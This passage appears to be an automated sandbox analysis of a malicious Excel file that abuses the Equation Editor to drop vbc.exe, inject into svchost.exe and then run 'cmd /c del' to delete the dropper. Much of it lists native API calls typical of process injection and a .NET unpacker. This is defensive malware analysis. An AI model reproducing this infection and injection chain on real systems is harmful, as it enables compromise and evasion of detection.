Source: C:\Users\Public\vbc.exe Code function: 6_2_004590A0 6_2_004590A0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455168 6_2_00455168
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045F980 6_2_0045F980
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B250 6_2_0045B250
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B260 6_2_0045B260
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045F388 6_2_0045F388
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B4C8 6_2_0045B4C8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B4D8 6_2_0045B4D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00450519 6_2_00450519
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045DDD1 6_2_0045DDD1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454E28 6_2_00454E28
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B6C0 6_2_0045B6C0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00911C26 6_2_00911C26
Source: C:\Users\Public\vbc.exe Code function: 6_2_00911A38 6_2_00911A38
Source: C:\Users\Public\vbc.exe Code function: 6_2_00911740 6_2_00911740
Source: C:\Users\Public\vbc.exe Code function: 7_2_00401030 7_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B982 7_2_0041B982
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C184 7_2_0041C184
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041CBAB 7_2_0041CBAB
Source: C:\Users\Public\vbc.exe Code function: 7_2_00408C60 7_2_00408C60
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B4A3 7_2_0041B4A3
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041BD18 7_2_0041BD18
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402D8A 7_2_00402D8A
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402D90 7_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402FB0 7_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0092E0C6 7_2_0092E0C6
Source: C:\Users\Public\vbc.exe Code function: 7_2_0095D005 7_2_0095D005
Source: C:\Users\Public\vbc.exe Code function: 7_2_0094905A 7_2_0094905A
Source: C:\Users\Public\vbc.exe Code function: 7_2_00933040 7_2_00933040
Source: C:\Users\Public\vbc.exe Code function: 7_2_0092E2E9 7_2_0092E2E9
Source: C:\Users\Public\vbc.exe Code function: 7_2_009D1238 7_2_009D1238
Source: C:\Users\Public\vbc.exe Code function: 7_2_009563DB 7_2_009563DB
Source: C:\Users\Public\vbc.exe Code function: 7_2_0092F3CF 7_2_0092F3CF
Source: C:\Users\Public\vbc.exe Code function: 7_2_00932305 7_2_00932305
Source: C:\Users\Public\vbc.exe Code function: 7_2_00937353 7_2_00937353
Source: C:\Users\Public\vbc.exe Code function: 7_2_0097A37B 7_2_0097A37B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00965485 7_2_00965485
Source: C:\Users\Public\vbc.exe Code function: 7_2_00941489 7_2_00941489
Source: C:\Users\Public\vbc.exe Code function: 7_2_0096D47D 7_2_0096D47D
Source: C:\Users\Public\vbc.exe Code function: 7_2_0094C5F0 7_2_0094C5F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0093351F 7_2_0093351F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00976540 7_2_00976540
Source: C:\Users\Public\vbc.exe Code function: 7_2_00934680 7_2_00934680
Source: C:\Users\Public\vbc.exe Code function: 7_2_0093E6C1 7_2_0093E6C1
Source: C:\Users\Public\vbc.exe Code function: 7_2_0097A634 7_2_0097A634
Source: C:\Users\Public\vbc.exe Code function: 7_2_009D2622 7_2_009D2622
Source: C:\Users\Public\vbc.exe Code function: 7_2_009B579A 7_2_009B579A
Source: C:\Users\Public\vbc.exe Code function: 7_2_0093C7BC 7_2_0093C7BC
Source: C:\Users\Public\vbc.exe Code function: 7_2_009657C3 7_2_009657C3
Source: C:\Users\Public\vbc.exe Code function: 7_2_009CF8EE 7_2_009CF8EE
Source: C:\Users\Public\vbc.exe Code function: 7_2_0093C85C 7_2_0093C85C
Source: C:\Users\Public\vbc.exe Code function: 7_2_0095286D 7_2_0095286D
Source: C:\Users\Public\vbc.exe Code function: 7_2_009D098E 7_2_009D098E
Source: C:\Users\Public\vbc.exe Code function: 7_2_009329B2 7_2_009329B2
Source: C:\Users\Public\vbc.exe Code function: 7_2_009469FE 7_2_009469FE
Source: C:\Users\Public\vbc.exe Code function: 7_2_009B5955 7_2_009B5955
Source: C:\Users\Public\vbc.exe Code function: 7_2_009E3A83 7_2_009E3A83
Source: C:\Users\Public\vbc.exe Code function: 7_2_009DCBA4 7_2_009DCBA4
Source: C:\Users\Public\vbc.exe Code function: 7_2_009BDBDA 7_2_009BDBDA
Source: C:\Users\Public\vbc.exe Code function: 7_2_0092FBD7 7_2_0092FBD7
Source: C:\Users\Public\vbc.exe Code function: 7_2_00957B00 7_2_00957B00
Source: C:\Users\Public\vbc.exe Code function: 7_2_009CFDDD 7_2_009CFDDD
Source: C:\Users\Public\vbc.exe Code function: 7_2_00960D3B 7_2_00960D3B
Source: C:\Users\Public\vbc.exe Code function: 7_2_0093CD5B 7_2_0093CD5B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00962E2F 7_2_00962E2F
Source: C:\Users\Public\vbc.exe Code function: 7_2_0094EE4C 7_2_0094EE4C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00940F3F 7_2_00940F3F
Source: C:\Users\Public\vbc.exe Code function: 7_2_0095DF7C 7_2_0095DF7C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009FE0C6 9_2_009FE0C6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A2D005 9_2_00A2D005
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A03040 9_2_00A03040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A1905A 9_2_00A1905A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009FE2E9 9_2_009FE2E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00AA1238 9_2_00AA1238
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00AA63BF 9_2_00AA63BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009FF3CF 9_2_009FF3CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A263DB 9_2_00A263DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A02305 9_2_00A02305
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A4A37B 9_2_00A4A37B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A07353 9_2_00A07353
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A35485 9_2_00A35485
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A11489 9_2_00A11489
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A3D47D 9_2_00A3D47D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A1C5F0 9_2_00A1C5F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A0351F 9_2_00A0351F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A46540 9_2_00A46540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A04680 9_2_00A04680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A0E6C1 9_2_00A0E6C1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00AA2622 9_2_00AA2622
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A4A634 9_2_00A4A634
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A0C7BC 9_2_00A0C7BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A8579A 9_2_00A8579A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A357C3 9_2_00A357C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A9F8EE 9_2_00A9F8EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A2286D 9_2_00A2286D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A0C85C 9_2_00A0C85C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A029B2 9_2_00A029B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00AA098E 9_2_00AA098E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A169FE 9_2_00A169FE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A85955 9_2_00A85955
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00AB3A83 9_2_00AB3A83
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00AACBA4 9_2_00AACBA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009FFBD7 9_2_009FFBD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A8DBDA 9_2_00A8DBDA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A27B00 9_2_00A27B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A9FDDD 9_2_00A9FDDD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A30D3B 9_2_00A30D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A0CD5B 9_2_00A0CD5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A32E2F 9_2_00A32E2F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A1EE4C 9_2_00A1EE4C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A9CFB1 9_2_00A9CFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A10F3F 9_2_00A10F3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A2DF7C 9_2_00A2DF7C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009C184 9_2_0009C184
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B4A3 9_2_0009B4A3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B982 9_2_0009B982
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009CBAB 9_2_0009CBAB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00088C60 9_2_00088C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00082D8A 9_2_00082D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00082D90 9_2_00082D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00082FB0 9_2_00082FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_008467C7 9_2_008467C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00845062 9_2_00845062
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_008432FF 9_2_008432FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00843302 9_2_00843302
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00841362 9_2_00841362
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_008475B2 9_2_008475B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_008408F9 9_2_008408F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00840902 9_2_00840902
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00A6F970 appears 81 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00A43F92 appears 132 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00A4373B appears 238 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 009FE2A8 appears 38 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 009FDF5C appears 118 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0099F970 appears 81 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00973F92 appears 108 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0097373B appears 238 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0092E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0092DF5C appears 118 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 7_2_004181C0 NtCreateFile, 7_2_004181C0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418270 NtReadFile, 7_2_00418270
Source: C:\Users\Public\vbc.exe Code function: 7_2_004182F0 NtClose, 7_2_004182F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_004183A0 NtAllocateVirtualMemory, 7_2_004183A0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041826D NtReadFile, 7_2_0041826D
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041839A NtAllocateVirtualMemory, 7_2_0041839A
Source: C:\Users\Public\vbc.exe Code function: 7_2_009200C4 NtCreateFile,LdrInitializeThunk, 7_2_009200C4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00920048 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_00920048
Source: C:\Users\Public\vbc.exe Code function: 7_2_00920078 NtResumeThread,LdrInitializeThunk, 7_2_00920078
Source: C:\Users\Public\vbc.exe Code function: 7_2_009207AC NtCreateMutant,LdrInitializeThunk, 7_2_009207AC
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091F9F0 NtClose,LdrInitializeThunk, 7_2_0091F9F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091F900 NtReadFile,LdrInitializeThunk, 7_2_0091F900
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_0091FAD0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_0091FAE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_0091FBB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_0091FB68
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FC90 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_0091FC90
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_0091FC60
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FD8C NtDelayExecution,LdrInitializeThunk, 7_2_0091FD8C
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_0091FDC0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FEA0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_0091FEA0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_0091FED0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FFB4 NtCreateSection,LdrInitializeThunk, 7_2_0091FFB4
Source: C:\Users\Public\vbc.exe Code function: 7_2_009210D0 NtOpenProcessToken, 7_2_009210D0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00920060 NtQuerySection, 7_2_00920060
Source: C:\Users\Public\vbc.exe Code function: 7_2_009201D4 NtSetValueKey, 7_2_009201D4
Source: C:\Users\Public\vbc.exe Code function: 7_2_0092010C NtOpenDirectoryObject, 7_2_0092010C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00921148 NtOpenThread, 7_2_00921148
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091F8CC NtWaitForSingleObject, 7_2_0091F8CC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00921930 NtSetContextThread, 7_2_00921930
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091F938 NtWriteFile, 7_2_0091F938
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FAB8 NtQueryValueKey, 7_2_0091FAB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FA20 NtQueryInformationFile, 7_2_0091FA20
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FA50 NtEnumerateValueKey, 7_2_0091FA50
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FBE8 NtQueryVirtualMemory, 7_2_0091FBE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FB50 NtCreateKey, 7_2_0091FB50
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FC30 NtOpenProcess, 7_2_0091FC30
Source: C:\Users\Public\vbc.exe Code function: 7_2_00920C40 NtGetContextThread, 7_2_00920C40
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FC48 NtSetInformationFile, 7_2_0091FC48
Source: C:\Users\Public\vbc.exe Code function: 7_2_00921D80 NtSuspendThread, 7_2_00921D80
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FD5C NtEnumerateKey, 7_2_0091FD5C
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FE24 NtWriteVirtualMemory, 7_2_0091FE24
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FFFC NtCreateProcessEx, 7_2_0091FFFC
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FF34 NtQueueApcThread, 7_2_0091FF34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F00C4 NtCreateFile,LdrInitializeThunk, 9_2_009F00C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F07AC NtCreateMutant,LdrInitializeThunk, 9_2_009F07AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EF9F0 NtClose,LdrInitializeThunk, 9_2_009EF9F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EF900 NtReadFile,LdrInitializeThunk, 9_2_009EF900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFAB8 NtQueryValueKey,LdrInitializeThunk, 9_2_009EFAB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_009EFAD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_009EFAE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_009EFBB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFB50 NtCreateKey,LdrInitializeThunk, 9_2_009EFB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_009EFB68
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_009EFC60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFD8C NtDelayExecution,LdrInitializeThunk, 9_2_009EFD8C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_009EFDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_009EFED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFFB4 NtCreateSection,LdrInitializeThunk, 9_2_009EFFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F10D0 NtOpenProcessToken, 9_2_009F10D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F0048 NtProtectVirtualMemory, 9_2_009F0048
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F0078 NtResumeThread, 9_2_009F0078
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F0060 NtQuerySection, 9_2_009F0060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F01D4 NtSetValueKey, 9_2_009F01D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F010C NtOpenDirectoryObject, 9_2_009F010C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F1148 NtOpenThread, 9_2_009F1148
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EF8CC NtWaitForSingleObject, 9_2_009EF8CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EF938 NtWriteFile, 9_2_009EF938
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F1930 NtSetContextThread, 9_2_009F1930
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFA20 NtQueryInformationFile, 9_2_009EFA20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFA50 NtEnumerateValueKey, 9_2_009EFA50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFBE8 NtQueryVirtualMemory, 9_2_009EFBE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFC90 NtUnmapViewOfSection, 9_2_009EFC90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFC30 NtOpenProcess, 9_2_009EFC30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFC48 NtSetInformationFile, 9_2_009EFC48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F0C40 NtGetContextThread, 9_2_009F0C40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F1D80 NtSuspendThread, 9_2_009F1D80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFD5C NtEnumerateKey, 9_2_009EFD5C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFEA0 NtReadVirtualMemory, 9_2_009EFEA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFE24 NtWriteVirtualMemory, 9_2_009EFE24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFFFC NtCreateProcessEx, 9_2_009EFFFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFF34 NtQueueApcThread, 9_2_009EFF34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_000981C0 NtCreateFile, 9_2_000981C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00098270 NtReadFile, 9_2_00098270
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_000982F0 NtClose, 9_2_000982F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_000983A0 NtAllocateVirtualMemory, 9_2_000983A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009826D NtReadFile, 9_2_0009826D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009839A NtAllocateVirtualMemory, 9_2_0009839A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0084632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 9_2_0084632E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_008467C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 9_2_008467C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00846332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 9_2_00846332
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_008467C2 NtQueryInformationProcess, 9_2_008467C2
PE file contains strange resources
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76E90000 page execute and read and write
Source: vbc[1].exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: COAU7229898130.xlsx Virustotal: Detection: 35%
Source: COAU7229898130.xlsx ReversingLabs: Detection: 34%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$COAU7229898130.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE954.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/27@6/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: vbc[1].exe.4.dr, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: vbc.exe.4.dr, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.2.vbc.exe.f70000.2.unpack, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.0.vbc.exe.f70000.0.unpack, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.0.vbc.exe.f70000.0.unpack, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.vbc.exe.f70000.5.unpack, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, svchost.exe
Source: Binary string: svchost.pdb source: vbc.exe, 00000007.00000002.514322943.0000000000549000.00000004.00000020.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: vbc[1].exe.4.dr, Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.4.dr, Form1.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
